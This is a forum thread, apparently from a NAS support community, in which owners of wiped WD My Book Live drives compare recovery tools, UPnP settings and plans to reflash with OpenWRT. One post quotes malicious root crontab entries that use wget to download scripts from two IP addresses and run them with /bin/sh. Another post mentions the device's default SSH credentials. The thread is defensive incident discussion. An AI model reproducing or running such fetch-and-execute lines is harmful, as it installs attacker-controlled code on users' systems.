Thanks so much for the reassurance!
Okay friends, I have an old netbook thatās never been attached to this network but still works alright, I was thinking I could attach the MBL to it via the Ethernet port and maybe attempt recovering stuff or something while keeping it off the Internet. Is this a plausible plan of attack and how would I go about accessing the drive while keeping it off the network?
The instructions are here:
I get the same from from /etc/crontab
as @Linuxcpa but with these additional lines:
1 * * * * root rm -f /tmp/w;wget -O /tmp/w http://213.217.0.184/w;/bin/sh /tmp/w
2 2 * * * root rm -f /tmp/wB;wget -O /tmp/wB http://188.92.72.129/wB;/bin/sh /tmp/wB
Iām deleting them.
I was not hacked, but today I just plugged the internet cable off my router and leave all the rest untouched to perform a backup.
Then I powered off the unit and plugged back the fiber cable. Thats all
All files that I have accessed and recovered so far were fine and intact.
Iām not confident that these settings do in fact disable UPnP. At the moment my configuration is as per your screenshot, but every 20 seconds I see a collection of packets from the NAS that looks like this:
13:12:34.273606 IP 192.168.10.137.44074 > 239.255.255.250.upnp: UDP, length 336
E..lP..........%.....*.l.X3.NOTIFY * HTTP/1.1
HOST: 239.255.255.250:1900
CACHE-CONTROL: max-age=100
LOCATION: http://192.168.10.137:49152/nasdevice.xml
NT: upnp:rootdevice
NTS: ssdp:alive
SERVER: Linux/2.6.32.11-svn70860, UPnP/1.0, Portable SDK for UPnP devices/1.6.6
X-User-Agent: redsonic
USN: uuid:736[censored because I don't know if this is sensitive]663::upnp:rootdevice
I am not super familiar with UPnP but it looks like the device is still attempting to set up UPnP mapping even when itās disabled. I have also tried setting Connection Options to Manual which did not change the symptoms.
Wanted to make sure to thank you for your efforts here to help patch this for those of us who were unaffected. Grabbed the factory reset script exits and commented out the sudo commands you identified (since I donāt ever intend to change language settings).
Appreciate it
Registered to give my 2 cents, or 0.016 euro. As of yesterday I shut the drive down and removed power upon observing the unfolding mess online (after backing up some critical stuff), but as of that time, the drive was unaffected. It seems I had escaped the āgreat wipeā. It was a serious wake-up call, since I had been lax in backing up some crucial data from it. Bullet dodged. For what itās worth, my drive configuration:
- Auto updates turned off
- Remote access turned off
- FTP turned on
- Time sync turned on
Router side:
- Upnp disabled.
- One port-forwarding entry set up for the FTP to the MBL, but remapped from 21 to some big obscure port number.
Even if I have escaped this nasty exploit, the revelations brought about on this thread are frankly jaw-dropping. āAtrociousā is the word I would use to describe the security of this device, and there is no way in all the circles of Danteās inferno I would trust this thing on my network. Once Iāve shut off the WAN and backed everything up, I fully intend to install OpenWRT on it.
I have followed this issue and it appears that the malware attack is particularly vicious.
No prob. I did see some large .mp4 files coming through, something in the range of 900MB to 1.5GB each. So, maybe there is hope after all!
Hope your data recovery company uses a powerful machine. Reading sectors by sectors on a 2TB drive (or larger) is just time consuming.
UPDATE
A few days ago I began using sysinternals Linux recovery to recover the files, and I must say Iām impressed with what it found. Nothingās sorted, or named correctly, so the GBs of exe files are mostly useless because they were intended to work with other files for whatever program they were for. But it has found a lot of files from years back that I had backed up. Although Iām certain it didnāt find everything- Iām pretty sure I had some apk files saved which the program canāt recover, and thereās probably some other file formats it didnāt recover. The transfer slowed real down when getting to txt files, which for some reason consisted of 24 GB of binary data nonsense, in thousands of files less than a MB. I would guess for any data the program couldnāt file associate to it just made a txt file instead. I restarted so it could restore everything past the txt files, and I might not bother with restoring them anyways. Once the file transfer is done Iām installing openWRT onto the MBL, which I found out you can do from a post here.
Has anyone with an affected device previously changed their SSH username/password from the default root/welc0me? This canāt be done from the admin webpage and has to be done when SSHād in.
Same question for if youāve been affected & have previously generated certificates to be able to use SFTP instead of FTP.
Edit: ahh, CVE-2018-18472 root escalation would bypass the SSH password anyway
39 hours in to my DiskInternals Data Recovery of /DataVolume and still only 7% done. Running it via standard laptop and USB connected SATA docking station. If I stop the scan would it impact me taking it to a data recovery expert??
You can stop the scan, but Iād recommend using a desktopās sata connection - using usb is going to slow scanning down significantly
Yes, that looks all good. What is inside /etc/init.d/auto_update , by the way?
If true, thatās odd. The good news is as long as UPnP is disabled on the router it canāt forward those ports either way.
Was your machine infected and now youāre experimenting with it?
Not infected, thankfully. UPnP was disabled on the router.
Had a look at my MBL yesterday having seen the news. Sure enough all files gone.
It wasnāt something I used frequently, but I had years of records on there which I could do without having to reconstruct.
Iāve written it off, cracked it open and put the HDD in external enclosure, connected to a win10 PC via USB 3. Iāve run Photorec on the āunknownā partition labelled āwhole diskā.
Luckily the only non music / photo files I had on the drive largely relate to the records I need, so Iāve just been moving out PDF, DOC and XLSX files as they get recovered and I have 566 items in perfect working order on that front.
I also have 1000s of photos and videos I wanāt that bothered about and a load of creative stuff I had backup up elsewhere but its good to know its still there. So far there has been corruption to the odd video file, but 95% of files are perfectly good.
So really just to reassure anyone who has lost something critical in this attack, it may well be recoverable. The scan looks like it will take 8hrs overall on my machine and Iāve spent about 3hrs actively grabbing and categorising recovered files - not even really enough for me to stop and script something to delete all the junk files Iām not interested in. Just been going through everything visuallyā¦
If you arenāt tech minded and willing to pull things apart and run strange software, but need to try to recover something, send the drive to a specialist and there is hope.